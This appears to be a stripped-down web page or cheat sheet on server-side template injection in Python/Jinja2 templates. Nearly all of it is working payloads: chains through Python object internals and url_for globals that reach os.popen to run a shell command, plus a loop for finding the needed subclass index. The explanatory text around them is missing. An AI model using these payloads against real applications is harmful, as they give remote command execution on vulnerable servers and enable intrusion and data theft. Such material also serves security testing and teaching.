Server-Side Template Injection (SSTI)
Last updated
Last updated
{{''.__class__.__base__.__subclasses__()[139].__init__.globals__['sys'].modules['os'].popen('id').read()}}for index, item in enumerate(''.__class__.__base__.__subclasses__()):
print(index, item){{
''.__class__
.__base__
.__subclasses__()[139]
.__init__
.globals__['sys']
.modules['os']
.popen('id')
.read()
}}{{
url_for
.__globals__
.os
.popen('id')
.read()
}}